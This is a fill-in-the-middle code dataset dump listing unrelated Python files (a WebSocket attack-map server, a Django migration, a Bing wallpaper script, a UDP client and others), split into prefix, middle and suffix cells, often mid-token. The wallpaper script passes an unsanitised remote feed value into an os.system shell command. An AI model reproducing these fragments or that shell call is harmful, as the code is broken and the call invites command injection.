repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
belial1337/WorldAttackMap | wss.py | Python | gpl-2.0 | 1,664 | 0.02524 | #!/usr/bin/python
import socket
import re
import binascii
import struct
import time
import sys
import random
from base64 import b64encode
from hashlib import sha1
from thread import *
events = "/var/www/map/eventstream"
with open(events) as f:
content = f.read().splitlines()
f.close()
websocket_answer = (
'HTTP/1.1 101 Switching Protocols',
'Upgrade: websocket',
'Connection: Upgrade',
'Sec-WebSocket-Accept: {key}\r\n\r\n',
)
GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket Created'
try:
s.bind(('192.168.1.101', 443))
except socket.error as msg:
print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
print 'Socket bind comp | lete'
s.listen(10)
print "Listening for connections"
def clientthread(client):
while True:
for line in content:
length = len(line)
preamble = "\x81\x7e" + struct.pack(">i", length)[2:]
client.send(preamble+line)
print "Sending Attack Event Size: " + hex(length) + " Byt | es\n"
random.seed()
n = random.random()
time.sleep(n)
client.close()
while 1:
client, address = s.accept()
print 'Got connection from', address
text = client.recv(1024)
print text
key = (re.search('Sec-WebSocket-Key:\s+(.*?)[\n\r]+', text)
.groups()[0]
.strip())
response_key = b64encode(sha1(key + GUID).digest())
response = '\r\n'.join(websocket_answer).format(key=response_key)
print response
client.send(response)
client.recv(1)
start_new_thread(clientthread ,(client,))
s.close()
|
paylogic/atilla | atilla/exceptions.py | Python | mit | 1,492 | 0.00067 | """Exceptions for APIs."""
impor | t werkzeug.exceptions
class ApiException(Exception):
"""An exception raised due to user error.
Exceptions derived from ApiException will be logge | d automatically if raised.
User will receive appropriate error response according to the content type.
"""
description = 'API error.'
error_type = 'API_ERROR'
data = None
def __init__(self, message, description=None, status_code=None, **kwargs):
"""Constructor.
:param message: the message returned to the user.
:param description: the message sent to the log.
"""
self.message = message
if description is not None or not hasattr(self, 'description'):
self.description = description
if status_code is not None:
self.code = status_code
if kwargs:
self.data = kwargs
class NotFound(ApiException, werkzeug.exceptions.NotFound):
"""Not found."""
description = 'Not found.'
error_type = 'NOT_FOUND'
class BadRequest(ApiException, werkzeug.exceptions.BadRequest):
"""Bad request."""
description = 'Bad request.'
error_type = 'BAD_REQUEST'
class Forbidden(ApiException, werkzeug.exceptions.Forbidden):
"""Forbidden."""
description = 'Forbidden.'
error_type = 'FORBIDDEN'
class Unauthorized(ApiException, werkzeug.exceptions.Unauthorized):
"""Unauthorized."""
description = 'Unauthorized.'
error_type = 'UNAUTHORIZED'
|
dchaplinsky/pep.org.ua | pepdb/core/migrations/0073_auto_20160213_0335.py | Python | mit | 8,548 | 0.002457 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0072_auto_20160210_0246'),
]
operations = [
migrations.AddField(
model_name='declaration',
name='office_en',
field=models.CharField(max_length=512, null=True, verbose_name='\u0412\u0456\u0434\u043e\u043c\u0441\u0442\u0432\u043e', blank=True),
),
migrations.AddField(
model_name='declaration',
name='office_uk',
field=models.CharField(max_length=512, null=True, verbose_name='\u0412\u0456\u0434\u043e\u043c\u0441\u0442\u0432\u043e', blank=True),
),
migrations.AddField(
model_name='declaration',
name='position_en',
field=models.CharField(max_length=512, null=True, verbose_name='\u041f\u043e\u0441\u0430\u0434\u0430', blank=True),
),
migrations.AddField(
model_name='declaration',
name='position_uk',
field=models.CharField(max_length=512, null=True, verbose_name='\u041f\u043e\u0441\u0430\u0434\u0430', blank=True),
),
migrations.AddField(
model_name='declaration',
name='region_en',
field=models.CharField(max_length=50, null=True, verbose_name='\u0420\u0435\u0433\u0456\u043e\u043d', blank=True),
),
migrations.AddField(
model_name='declaration',
name='region_uk',
field=models.CharField(max_length=50, null=True, verbose_name='\u0420\u0435\u0433\u0456\u043e\u043d', blank=True),
),
migrations.AlterField(
model_name='company2company',
name='date_confirmed_details',
field=models.IntegerField(default=0, verbose_name='\u0442\u043e\u0447\u043d\u0456\u0441\u0442\u044c', choices=[(0, '\u0422\u043e\u0447\u043d\u0430 \u0434\u0430\u0442\u0430'), (1, '\u0420\u0456\u043a \u0442\u0430 \u043c\u0456\u0441\u044f\u0446\u044c'), (2, '\u0422\u0456\u043b\u044c\u043a\u0438 \u0440\u0456\u043a')]),
),
migrations.AlterField(
model_name='company2company',
name='date_established_details',
field=models.IntegerField(default=0, verbose_name='\u0442\u043e\u0447\u043d\u0456\u0441\u0442\u044c', choices=[(0, '\u0422\u043e\u0447\u043d\u0430 \u0434\u0430\u0442\u0430'), (1, '\u0420\u0456\u043a \u0442\u0430 \u043c\u0456\u0441\u044f\u0446\u044c'), (2, '\u0422\u0456\u043b\u044c\u043a\u0438 \u0440\u0456\u043a')]),
),
migrations.AlterField(
| model_name='company2company',
name='date_finished_details',
field=models.IntegerField(default=0, verbose_name='\u0 | 442\u043e\u0447\u043d\u0456\u0441\u0442\u044c', choices=[(0, '\u0422\u043e\u0447\u043d\u0430 \u0434\u0430\u0442\u0430'), (1, '\u0420\u0456\u043a \u0442\u0430 \u043c\u0456\u0441\u044f\u0446\u044c'), (2, '\u0422\u0456\u043b\u044c\u043a\u0438 \u0440\u0456\u043a')]),
),
migrations.AlterField(
model_name='company2country',
name='date_confirmed_details',
field=models.IntegerField(default=0, verbose_name='\u0442\u043e\u0447\u043d\u0456\u0441\u0442\u044c', choices=[(0, '\u0422\u043e\u0447\u043d\u0430 \u0434\u0430\u0442\u0430'), (1, '\u0420\u0456\u043a \u0442\u0430 \u043c\u0456\u0441\u044f\u0446\u044c'), (2, '\u0422\u0456\u043b\u044c\u043a\u0438 \u0440\u0456\u043a')]),
),
migrations.AlterField(
model_name='company2country',
name='date_established_details',
field=models.IntegerField(default=0, verbose_name='\u0442\u043e\u0447\u043d\u0456\u0441\u0442\u044c', choices=[(0, '\u0422\u043e\u0447\u043d\u0430 \u0434\u0430\u0442\u0430'), (1, '\u0420\u0456\u043a \u0442\u0430 \u043c\u0456\u0441\u044f\u0446\u044c'), (2, '\u0422\u0456\u043b\u044c\u043a\u0438 \u0440\u0456\u043a')]),
),
migrations.AlterField(
model_name='company2country',
name='date_finished_details',
field=models.IntegerField(default=0, verbose_name='\u0442\u043e\u0447\u043d\u0456\u0441\u0442\u044c', choices=[(0, '\u0422\u043e\u0447\u043d\u0430 \u0434\u0430\u0442\u0430'), (1, '\u0420\u0456\u043a \u0442\u0430 \u043c\u0456\u0441\u044f\u0446\u044c'), (2, '\u0422\u0456\u043b\u044c\u043a\u0438 \u0440\u0456\u043a')]),
),
migrations.AlterField(
model_name='person2company',
name='date_confirmed_details',
field=models.IntegerField(default=0, verbose_name='\u0442\u043e\u0447\u043d\u0456\u0441\u0442\u044c', choices=[(0, '\u0422\u043e\u0447\u043d\u0430 \u0434\u0430\u0442\u0430'), (1, '\u0420\u0456\u043a \u0442\u0430 \u043c\u0456\u0441\u044f\u0446\u044c'), (2, '\u0422\u0456\u043b\u044c\u043a\u0438 \u0440\u0456\u043a')]),
),
migrations.AlterField(
model_name='person2company',
name='date_established_details',
field=models.IntegerField(default=0, verbose_name='\u0442\u043e\u0447\u043d\u0456\u0441\u0442\u044c', choices=[(0, '\u0422\u043e\u0447\u043d\u0430 \u0434\u0430\u0442\u0430'), (1, '\u0420\u0456\u043a \u0442\u0430 \u043c\u0456\u0441\u044f\u0446\u044c'), (2, '\u0422\u0456\u043b\u044c\u043a\u0438 \u0440\u0456\u043a')]),
),
migrations.AlterField(
model_name='person2company',
name='date_finished_details',
field=models.IntegerField(default=0, verbose_name='\u0442\u043e\u0447\u043d\u0456\u0441\u0442\u044c', choices=[(0, '\u0422\u043e\u0447\u043d\u0430 \u0434\u0430\u0442\u0430'), (1, '\u0420\u0456\u043a \u0442\u0430 \u043c\u0456\u0441\u044f\u0446\u044c'), (2, '\u0422\u0456\u043b\u044c\u043a\u0438 \u0440\u0456\u043a')]),
),
migrations.AlterField(
model_name='person2country',
name='date_confirmed_details',
field=models.IntegerField(default=0, verbose_name='\u0442\u043e\u0447\u043d\u0456\u0441\u0442\u044c', choices=[(0, '\u0422\u043e\u0447\u043d\u0430 \u0434\u0430\u0442\u0430'), (1, '\u0420\u0456\u043a \u0442\u0430 \u043c\u0456\u0441\u044f\u0446\u044c'), (2, '\u0422\u0456\u043b\u044c\u043a\u0438 \u0440\u0456\u043a')]),
),
migrations.AlterField(
model_name='person2country',
name='date_established_details',
field=models.IntegerField(default=0, verbose_name='\u0442\u043e\u0447\u043d\u0456\u0441\u0442\u044c', choices=[(0, '\u0422\u043e\u0447\u043d\u0430 \u0434\u0430\u0442\u0430'), (1, '\u0420\u0456\u043a \u0442\u0430 \u043c\u0456\u0441\u044f\u0446\u044c'), (2, '\u0422\u0456\u043b\u044c\u043a\u0438 \u0440\u0456\u043a')]),
),
migrations.AlterField(
model_name='person2country',
name='date_finished_details',
field=models.IntegerField(default=0, verbose_name='\u0442\u043e\u0447\u043d\u0456\u0441\u0442\u044c', choices=[(0, '\u0422\u043e\u0447\u043d\u0430 \u0434\u0430\u0442\u0430'), (1, '\u0420\u0456\u043a \u0442\u0430 \u043c\u0456\u0441\u044f\u0446\u044c'), (2, '\u0422\u0456\u043b\u044c\u043a\u0438 \u0440\u0456\u043a')]),
),
migrations.AlterField(
model_name='person2person',
name='date_confirmed_details',
field=models.IntegerField(default=0, verbose_name='\u0442\u043e\u0447\u043d\u0456\u0441\u0442\u044c', choices=[(0, '\u0422\u043e\u0447\u043d\u0430 \u0434\u0430\u0442\u0430'), (1, '\u0420\u0456\u043a \u0442\u0430 \u043c\u0456\u0441\u044f\u0446\u044c'), (2, '\u0422\u0456\u043b\u044c\u043a\u0438 \u0440\u0456\u043a')]),
),
migrations.AlterField(
model_name='person2person',
name='date_established_details',
field=models.IntegerField(default=0, verbose_name='\u0442\u043e\u0447\u043d\u0456\u0441\u0442\u044c', choices=[(0, '\u0422\u043e\u0447\u043d\u0430 \u0434\u0430\u0442\u0430'), (1, '\u0420\u0456\u043a \u0442\u0430 \u043c\u0456\u0441\u044f\u0446\u044c'), (2, '\u0422\u0456\u043b\u044c\u043a\u0438 \u0440\u0456\u043a')]),
),
migrations.AlterField(
model_name='person2person',
name='dat |
mnhkahn/python_code | bing.py | Python | gpl-2.0 | 5,311 | 0.005791 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'backGroundC.ui'
#
# Created: Sat Jun 21 13:16:32 2014
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
from PyQt4 import QtCore
import urllib
import os
import getpass
from xml.etree import ElementTree as ET
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
#定义主URL
bingURL = 'http://cn.bing.com'
#定义RSSURL
rssURL = 'http://www.bing.com/HPImageArchive.aspx?format=xml&idx=0&n=8'
#定义图片地址URL
imageURL = ''
'''
通过BING的RSS得到DOM对象,获取节点
后拼接IMAGE路径保存到本地然后调用
Terminal执行设定BACKGROUND的命令
'''
def updateBack():
#获取RSS源
root = ET.fromstring(urllib.urlopen(rssURL).read())
#查到最新的一张BING壁纸URL
img = root.getiterator('image')[0].find('url').text
#获取用户名,用来拼接图片路径
user_name = getpass.getuser()
#获取图片编号用来当作本地图片的名称
name = root.getiterator('image')[0].find('fullstartdate').text
#拼接图片
imageURL = bingURL + img
#下载图片
urllib.urlretrieve(imageURL, r'/home/%s/%s.jpg' % ( user_name, name))
#设置背景
os.system('gsettings set org.gnome.desktop.background picture-uri "file:///home/%s/%s.jpg"' % (user_name, name ))
class Ui_MainWindow(QtGui.QMainWindow):
def setupUi(self, MainWindow):
try:
#测试是否是开机启动,是的话直接更新背景完成后退出程序
sys.argv[1]
updateBack()
sys.exit()
except Exception, e:
#否则判定为手动启动
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(297, 130)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.s | etObjectName(_fromUtf8("centralwidget"))
self.pushButton = QtGui.QPushButton(self.centralwidget)
self.pushButton.setGeometry(QtCore.QRect(10, 10, 281, 41))
self.pushButton.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
self.pushButton.setObjectName(_fromUtf8("pushButton") | )
self.pushButton2 = QtGui.QPushButton(self.centralwidget)
self.pushButton2.setGeometry(QtCore.QRect(10, 60, 281, 41))
self.pushButton2.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
self.pushButton2.setObjectName(_fromUtf8("pushButton2"))
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
#链接点击事件
self.connect(self.pushButton, QtCore.SIGNAL('clicked()'), self.OnButtonFrush)
self.connect(self.pushButton2, QtCore.SIGNAL('clicked()'), self.OnButtonAutoFrush)
#点击自动更新按钮事件
def OnButtonAutoFrush(self):
try:
#创建desktop文件放在启动文件夹下
file = open("/home/%s/.config/autostart/autobing.desktop" % (getpass.getuser()), 'w')
desktop = """[Desktop Entry]
Version=1.0
Encoding=UTF-8
Name=AutoBing
Type=Application
Exec=python "%s/%s" one
Terminal=false
Comment=auto change systembackground from bingimage
NoDisplay=false
Categories=Utility; """ % (os.getcwd(), os.path.basename(__file__))
file.write(desktop)
file.close()
QtGui.QMessageBox.information(self, u'提示', u'自动更新设置成功\n如果移动了程序路径请重新设置')
except Exception, e:
QtGui.QMessageBox.information(self, u'提示', u'''设置自动更新失败''')
raise e
#点击刷新桌面壁纸
def OnButtonFrush(self):
try:
updateBack()
QtGui.QMessageBox.information(self, u'提示', u'''BING壁纸更新成功''')
pass
except Exception, e:
QtGui.QMessageBox.information(self, u'提示', u'''更新失败''')
raise
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "BING壁纸自动更换", None))
self.pushButton.setText(_translate("MainWindow", "手动刷新", 'pushButton'))
self.pushButton2.setText(_translate("MainWindow", "登陆自动刷新", 'pushButton2'))
class BingWindow(QtGui.QMainWindow):
#初始化界面
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.madWindow()
def madWindow(self):
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
import sys
app = QtGui.QApplication(sys.argv)
myqq = BingWindow()
myqq.show()
sys.exit(app.exec_())
|
elric/virtaal-debian | virtaal/plugins/terminology/models/localfile/localfileview.py | Python | gpl-2.0 | 17,737 | 0.002932 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2009-2010 Zuza Software Foundation
#
# This file is part of Virtaal.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
import os.path
import gtk
import logging
import pango
from gtk import gdk
from locale import strcoll
from translate.lang import factory as lang_factory
from translate.storage import factory as store_factory
from virtaal.common.pan_app import ui_language
from virtaal.views.baseview import BaseView
from virtaal.views import rendering
from virtaal.views.theme import current_theme
class LocalFileView:
"""
Class that manages the localfile terminology plug-in's GUI presense and interaction.
"""
# INITIALIZERS #
def __init__(self, model):
self.term_model = model
self.controller = model.controller
self.mainview = model.controller.main_controller.view
self._signal_ids = []
self._setup_menus()
self.addterm = TermAddDialog(model=model)
self.fileselect = FileSelectDialog(model=model)
# METHODS #
def _setup_menus(self):
mnu_transfer = self.mainview.gui.get_widget('mnu_placnext')
self.mnui_edit = self.mainview.gui.get_widget('menuitem_edit')
self.menu = self.mnui_edit.get_submenu()
self.mnu_select_files, _menu = self.mainview.find_menu_item(_('Terminology _Files...'), self.mnui_edit)
if not self.mnu_select_files:
self.mnu_select_files = self.mainview.append_menu_item(_('Terminology _Files...'), self.mnui_edit, after=mnu_transfer)
self._signal_ids.append((
self.mnu_select_files,
self.mnu_select_files.connect('activate', self._on_select_term_files)
))
self.mnu_add_term, _menu = self.mainview.find_menu_item(_('Add _Term...'), self.mnui_edit)
if not self.mnu_add_term:
self.mnu_add_term = self.mainview.append_menu_item(_('Add _Term...'), self.mnui_edit, after=mnu_transfer)
self._signal_ids.append((
self.mnu_add_term,
self.mnu_add_term.connect('activate', self._on_add_term)
))
gtk.accel_map_add_entry("<Virtaal>/Terminology/Add Term", gtk.keysyms.t, gdk.CONTROL_MASK)
accel_group = self.menu.get_accel_group()
if accel_group is None:
accel_group = gtk.AccelGroup()
self.menu.set_accel_group(accel_group)
self.mnu_add_term.set_accel_path("<Virtaal>/Terminology/Add Term")
self.menu.set_accel_group(accel_group)
def destroy(self):
for gobj, signal_id in self._signal_ids:
gobj.disconnect(signal_id)
self.menu.remove(self.mnu_select_files)
self.menu.remove(self.mnu_add_term)
# EVENT HANDLERS #
def _on_add_term(self, menuitem):
self.addterm.run(parent=self.mainview.main_window)
def _on_select_term_files(self, menuitem):
self.fileselect.run(parent=self.mainview.main_window)
class FileSelectDialog:
"""
Wrapper for the selection dialog, created in Glade, to manage the list of
files used by this plug-in.
"""
COL_FILE, COL_EXTEND = range(2)
# INITIALIZERS #
def __init__(self, model):
self.controller = model.controller
self.term_model = model
self.gladefilename, self.gui = BaseView.load_glade_file(
["virtaal", "virtaal.glade"],
root='TermFilesDlg',
domain='virtaal'
)
self._get_widgets()
self._init_treeview()
self._init_add_chooser()
def _get_widgets(self):
widget_names = ('btn_add_file', 'btn_remove_file', 'btn_open_termfile', 'tvw_termfiles')
for name in widget_names:
setattr(self, name, self.gui.get_widget(name))
self.dialog = self.gui.get_widget('TermFilesDlg')
self.btn_add_file.connect('clicked', self._on_add_file_clicked)
self.btn_remove_file.connect('clicked', self._on_remove_file_clicked)
self.btn_open_termfile.connect('clicked', self._on_open_termfile_clicked)
self.tvw_termfiles.get_selection().connect('changed', self._on_selection_changed)
def _init_treeview(self):
self.lst_files = gtk.ListStore(str, bool)
self.tvw_termfiles.set_model(self.lst_files)
cell = gtk.CellRendererText()
cell.props.ellipsize = pango.ELLIPSIZE_MIDDLE
col = gtk.TreeViewColumn(_('File'))
col.pack_start(cell)
col.add_attribute(cell, 'text', self.COL_FILE)
col.set_expand(True)
col.set_sort_column_id(0)
self.tvw_termfiles.append_column(col)
cell = gtk.CellRendererToggle()
cell.set_radio(True)
cell.connect('toggled', self._on_toggle)
col = gtk.TreeViewColumn(_('Extendable'))
col.pack_start(cell)
col.add_attribute(cell, 'active', self.COL_EXTEND)
col.set_expand(False)
self.tvw_termfiles.append_column(col)
extend_file = self.term_model.config.get('extendfile', '')
files = self.term_model.config['files']
for f in files:
self.lst_files.append([f, f == extend_file])
# If there was no extend file, select the first one
for row in self.lst_files:
if row[self.COL_EXTEND]:
break
else:
itr = self.lst_files.get_iter_first()
if itr and self.lst_files.iter_is_valid(itr):
self.lst_files.set_value(itr, self.COL_EXTEND, True)
self.term_model.config['extendfile'] = self.lst_files.get_value(itr, self.COL_FILE)
self.term_model.save_config()
def _init_add_chooser(self):
# The following code was mostly copied from virtaal.views.MainView._create_dialogs()
dlg = gtk.FileChooserDialog(
_('Add Files'),
self.controller.main_controller.view.main_window,
gtk.FILE_CHOOSER_ACTION_OPEN,
(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL, gtk.STOCK_OPEN, gtk.RESPONSE_OK)
)
dlg.set_default_response(gtk.RESPONSE_OK)
all_supported_filter = gtk.FileFilter()
all_supported_filter.set_name(_("All Supported Files"))
dlg.add_filter(all_supported_filter)
supported_file | s_dict = dict([ (_(name), (extension, mimetype)) for name, extension, mimetype in store_factory.supported_files() ])
supported_file_names = supported_files_dict.keys()
supported_file_names.sort(cmp=strcoll)
for name in supported_file_names:
extensions, mimetypes = supported_files_dict[name]
#XXX: we can't open generic .csv formats, so listing it is probably
# more harmful than good.
if "csv" in extensions:
| continue
new_filter = gtk.FileFilter()
new_filter.set_name(name)
if extensions:
for extension in extensions:
new_filter.add_pattern("*." + extension)
all_supported_filter.add_pattern("*." + extension)
for compress_extension in store_factory.decompressclass.keys():
new_filter.add_pattern("*.%s.%s" % (extension, compress_extension))
all_supported_filter.add_pattern("*.%s.%s" % (extension, compress_extension))
if mimetypes:
for mimetype in mimetypes:
new_filter.add_mime_type(mimetype)
all_supported_filter.add_mime_type(mimetype)
dlg.add_filter(new_filter)
all_filter = gtk.FileFilter()
all_f |
krishardy/dynip | dynip/client.py | Python | bsd-2-clause | 4,662 | 0.007508 | """
DynIP Client
A embarrisingly-simple client with sends UDP packets to the DynIP server.
"""
"""
Copyright (c) 2011, R. Kristoffer Hardy
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import socket
import sys
import logging
import argparse
import ConfigParser
import traceback
import return_codes as rc
CONFIG_SECTION = "DynIP:Client"
# DEFAULT_SERVER_HOSTNAME:
# Hostname or IP Address
# Example:
# DEFAULT_SERVER_HOSTNAME="127.0.0.1" # By IP Address
# DEFAULT_SERVER_HOSTNAME="google.com" # By domain n | ame
DEFAULT_SERVER_HOSTNAME="localhost"
# DEFAULT_SERVER_PORT:
# The port that the server is listening on
DEFAULT_SERVER_PORT=28630
logging.basicConfig()
| log = logging.getLogger(__name__)
log.setLevel(logging.WARNING)
# Prepare argparser
argparser = argparse.ArgumentParser(description="Sends a single packet to the DynIP server.")
argparser.add_argument('-v', '--verbose', help="Enable verbose (INFO-level) logging",
action='store_const',
default=logging.WARNING,
const=logging.INFO
)
argparser.add_argument('--debug', help="Enable debug (DEBUG-level) logging",
action='store_const',
default=logging.WARNING,
const=logging.DEBUG
)
argparser.add_argument('config', help="Configuration .conf file",
type=str, nargs=1)
def main():
"""
Send a single UDP datagram to the server
"""
# Parse the command-line arguments
args = argparser.parse_args()
log.setLevel(min(args.verbose, args.debug))
try:
config = ConfigParser.ConfigParser(
{CONFIG_SECTION:
{'server_hostname': DEFAULT_SERVER_HOSTNAME,
'server_port': DEFAULT_SERVER_PORT
}
})
config.read(args.config)
server_hostname = config.get(CONFIG_SECTION, 'server_hostname')
server_port = config.get(CONFIG_SECTION, 'server_port')
except:
log.fatal("ERROR: Could not read configuration file {0}".format(args.config))
return rc.CANNOT_READ_CONFIG
# Validate the params
if server_hostname == "":
log.fatal("ERROR: server_hostname is required")
return rc.SERVER_HOSTNAME_MISSING
log.debug("Looking up hostname")
server_ip = socket.gethostbyname(server_hostname)
if send_packet(server_ip, server_port) == True:
return rc.OK
else:
return rc.PACKET_SEND_FAILED
def send_packet(destination_ip, destination_port):
"""
Send a single UDP packet to the target server.
:param destination_ip: IP address of the server
:type desination_ip: str
:param destination_port: Port number of the server
:type destination_port: int
"""
try:
import socket
log.debug("Preparing message")
message = socket.gethostname()
log.debug("Preparing socket")
sock = socket.socket(
socket.AF_INET,
socket.SOCK_DGRAM
)
log.debug("Sending UDP datagram to {0}:{1}".format(destination_ip, destination_port))
sock.sendto(message, (destination_ip, int(destination_port)))
return True
except:
log.warning("Packet should not be sent to the destination")
log.warning(traceback.format_exc())
return False
def usage():
"""Print usage information"""
argparser.print_help()
if __name__ == "__main__":
sys.exit(main())
|
v-iam/azure-sdk-for-python | azure-mgmt-consumption/azure/mgmt/consumption/models/__init__.py | Python | mit | 1,087 | 0 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .meter_details import MeterDetails
from .usage_detail import UsageDetail
from .error_details import ErrorDetails
from .error_response import ErrorResponse, ErrorResponseException
from .operation_display import OperationDisplay
from .operation import Operation
from .resource import Resource
from .usage_detail_paged import UsageDe | tailPaged
from .operation_paged import OperationPaged
__all__ = [
'MeterDetails',
'UsageDetail',
'ErrorDetails',
'ErrorResponse', 'ErrorResponseException',
'OperationDisplay',
'Operation',
'Resource',
'UsageDetailPaged',
' | OperationPaged',
]
|
dturner-tw/pants | tests/python/pants_test/goal/test_run_tracker_integration.py | Python | apache-2.0 | 1,258 | 0.005564 | # coding=utf-8
# Copyright 2016 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import json
from pants.util.contextutil import temporary_file_path
from pants_test.pants_run_integration_test import PantsRunIntegrationTest
class RunTrackerIntegrationTest(PantsRunIntegrationTest):
def test_stats_local_json_file(self):
with temporary_file_path() as tmpfile:
pants_run = self.run_pants(['test',
| '--run-tracker-stats-local-json-file={}'.format(tmpfile),
'testprojects/src/java/org/pantsbuild/testproject/unicode/main'])
self.assert_success(pants_run)
with open(tmpfile, 'r') as fp:
stats_json = json.load(fp)
self.assertIn('outcomes', stats_json)
self.assertEqual(stats_json['outcomes']['main:test'], 'SUCCESS')
self.assertIn('artifact_cache_stats', st | ats_json)
self.assertIn('run_info', stats_json)
self.assertIn('self_timings', stats_json)
self.assertIn('cumulative_timings', stats_json)
|
ActiveState/code | recipes/Python/491280_BackgroundCall_Threading_like/recipe-491280.py | Python | mit | 2,587 | 0.016622 | def example_BackgroundCall():
import urllib,time
def work():
return urllib.urlopen('http://www.python.org/').read()
bkcall=BackgroundCall(work)
print 'work() executing in background ...'
while not bkcall.is_done():
print '.',
time.sleep(0.010)
print 'done.'
print bkcall.get_return()[:500]
import sys
from time import time as _time, sleep as _sleep
class Full(Exception):pass
class Empty(Exception):pass
class BackgroundCall:
"""BackgroundCall
Example:
bkcall=BackgroundCall( time_consuming_f | unction )
...
if bkcall.is_done():
print "got", bkcall.get_return()
"""
id=None
done=0 #1=returned; 2=exception raised
def __init__(self, func, args=(), kwargs={}):
import th | read
def thread_bkcall():
try:
self.ret=func(*args, **kwargs)
self.done=1
except:
self.exc=sys.exc_info()
self.done=2
self.id=thread.start_new(thread_bkcall, ())
def is_done(self):
return self.done
def get_return(self, wait=1, timeout=None, raise_exception=1, alt_return=None):
"""delivers the return value or (by default) echoes the exception of
the call job
wait: 0=no waiting; Attribute error raised if no
1=waits for return value or exception
callable -> waits and wait()-call's while waiting for return
"""
if not self.done and wait:
starttime=_time()
delay=0.0005
while not self.done:
if timeout:
remaining = starttime + timeout - _time()
if remaining <= 0: #time is over
if raise_exception:
raise Empty, "return timed out"
else:
return alt_return
delay = min(delay * 2, remaining, .05)
else:
delay = min(delay * 2, .05)
if callable(wait): wait()
_sleep(delay) #reduce CPU usage by using a sleep
if self.done==2: #we had an exception
exc=self.exc
del self.exc
if raise_exception & 1: #by default exception is raised
raise exc[0],exc[1],exc[2]
else:
return alt_return
return self.ret
def get_exception(self):
return self.exc
if __name__=='__main__':
example_BackgroundCall()
|
ourbest/sns_app | utils/scheduler.py | Python | lgpl-3.0 | 41 | 0 | from datetime import datetime, | timed | elta
|
alexandre-figura/portfolio | tests/system_and_unit_tests/conftest.py | Python | gpl-3.0 | 211 | 0 | import pytest
import | webtest
from portfolio import PortfolioFlatPages
@pytest.fixture
d | ef client(app):
return webtest.TestApp(app)
@pytest.fixture
def flatpages(app):
return PortfolioFlatPages(app)
|
enhean/fredist | src/fredist/classifier.py | Python | gpl-3.0 | 8,580 | 0.006876 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Author: Enrique Henestroza Anguiano
#
"""
Classifier for liblinear, svmlin. Agnostic about features or labels. Uses
'ranking', or dynamic classes.
"""
import sys
import os
import codecs
import svmlight
from libsvm import svmutil, svm
# Optional LIBLinear
try:
from liblinear import liblinearutil, liblinear
liblinear_found = True
except ImportError:
liblinear_found = False
from ctypes import *
